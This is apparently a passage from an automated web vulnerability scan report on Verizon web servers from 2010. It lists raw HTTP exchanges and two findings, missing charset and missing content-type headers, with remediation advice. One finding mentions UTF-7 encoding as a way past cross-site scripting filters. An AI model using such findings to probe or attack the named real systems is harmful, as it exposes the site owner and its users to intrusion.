HTTP/1.1 200 OK Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 RequestInfo: Served From :: BHDP1ISFTW06, Time Taken :: 78.123 Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 24516 Date: Sat, 20 Nov 2010 03:04:01 GMT Connection: close Set-Cookie: ASP.NET_SessionId=wb5cyl55wlsb3445xgv2idj4; path=/; HttpOnly Set-Cookie: DCReferringURL=/ShowTime.aspx; path=/
GET /fiosvoice/terms/Terms_of_Service.pdf HTTP/1.1 Host: www36.verizon.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Content-Length: 113145 Content-Type: application/pdf Content-Location: http://www36.verizon.com/fiosvoice/terms/Terms_of_Service.pdf Last-Modified: Tue, 19 Oct 2010 15:17:37 GMT Accept-Ranges: bytes ETag: "4815c0c3a06fcb1:854c" Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Expires: Sat, 20 Nov 2010 03:04:16 GMT Date: Sat, 20 Nov 2010 03:04:16 GMT Connection: close
%PDF-1.6%.... 99 0 obj<</Linearized 1/L 113145/O 102/E 37857/N 23/T 111118/H [ 2016 472]>>endobj xref 99 86 0000000016 00000 n 0000002488 00000 n 0000002649 00000 n 0000002701 ...[SNIP]...
GET /fiosvoice/userguide/User_Guide.pdf HTTP/1.1 Host: www36.verizon.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Content-Length: 5355590 Content-Type: application/pdf Content-Location: http://www36.verizon.com/fiosvoice/userguide/User_Guide.pdf Last-Modified: Tue, 31 Aug 2010 16:35:09 GMT Accept-Ranges: bytes ETag: "86fd27a2a49cb1:4c04" Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Expires: Sat, 20 Nov 2010 03:04:20 GMT Date: Sat, 20 Nov 2010 03:04:20 GMT Connection: close
If a web response states that it contains HTML content but does not specify a character set, then the browser may analyse the HTML and attempt to determine which character set it appears to be using. Even if the majority of the HTML actually employs a standard character set such as UTF-8, the presence of non-standard characters anywhere in the response may cause the browser to interpret the content using a different character set. This can have unexpected results, and can lead to cross-site scripting vulnerabilities in which non-standard encodings like UTF-7 can be used to bypass the application's defensive filters.
In most cases, the absence of a charset directive does not constitute a security flaw, particularly if the response contains static content. You should review the contents of the response and the context in which it appears to determine whether any vulnerability exists.
Issue remediation
For every response containing HTML content, the application should include within the Content-type header a directive specifying a standard recognised character set, for example charset=ISO-8859-1.
GET /help/dsl_settings/ HTTP/1.1 Host: www2.verizon.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Length: 139 Content-Type: text/html Cache-Control: private Date: Sat, 20 Nov 2010 03:06:55 GMT Connection: close Set-Cookie: ASPSESSIONIDSQRTBTDT=IHPHDNIDIIFPACJGGLIHPLLP; path=/
If a web response does not specify a content type, then the browser will usually analyse the response and attempt to determine the MIME type of its content. This can have unexpected results, and if the content contains any user-controllable data may lead to cross-site scripting or other client-side vulnerabilities.
In most cases, the absence of a content type statement does not constitute a security flaw, particularly if the response contains static content. You should review the contents of the response and the context in which it appears to determine whether any vulnerability exists.
Issue remediation
For every response containing a message body, the application should include a single Content-type header which correctly and unambiguously states the MIME type of the content in the response body.
GET /fiostv HTTP/1.1 Host: www36.verizon.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 503 Service Unavailable Content-Length: 62 Expires: Sat, 20 Nov 2010 03:04:00 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sat, 20 Nov 2010 03:04:00 GMT Connection: close
<html><body><b>Http/1.1 Service Unavailable</b></body> </html>
GET /fiostv HTTP/1.1 Host: www36.verizon.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 503 Service Unavailable Content-Length: 62 Expires: Sat, 20 Nov 2010 03:04:07 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sat, 20 Nov 2010 03:04:07 GMT Connection: close
<html><body><b>Http/1.1 Service Unavailable</b></body> </html>
Report generated by XSS.CX at Fri Nov 19 21:15:35 CST 2010.